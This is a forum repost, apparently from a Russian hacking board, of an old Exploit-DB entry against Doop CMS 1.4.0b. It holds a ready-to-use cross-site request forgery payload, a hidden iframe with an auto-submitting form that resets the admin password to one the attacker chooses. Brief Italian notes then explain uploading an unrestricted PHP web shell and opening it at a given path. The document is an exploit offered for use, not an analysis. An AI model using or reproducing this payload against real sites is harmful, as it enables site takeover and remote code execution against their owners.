Exploit doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7569
Проверка EDB
  1. Пройдено
Автор
X0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-12-24
Код:
--------------------------------------------------------------------------
| Project: Doop <= 1.4.0b CSRF && Upload Shell                           |
| Author: x0r                                                            |
| Email: [email protected]                                            |
|________________________________________________________________________|


#-- CSRF Change Admin Pass --#

----------------------------------------------------------------------
<iframe name="noscreen" frameborder="0" height="0" width="0"></iframe> 
<form name="admin" action="http://[site/[path]/index.php?action=admin"
method="post" target="noscreen">
<input type="hidden" name="save" value="[Your_Pass]">
<input type="submit" name="submit" value="Save"> 
</form><script>document.admin.submit()</script>
----------------------------------------------------------------------


#-- Upload Shell --#

Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi
file ( non controlla l'estensione), quindi anche shell...una volta uppata
la shell, possiamo usarla al seguente link:
http://[site]/[path]/pages/[shell.php].


# x0r
-- w00t Zone - w00tzone.org 

# milw0rm.com [2008-12-24]
 
Источник
www.exploit-db.com

Похожие темы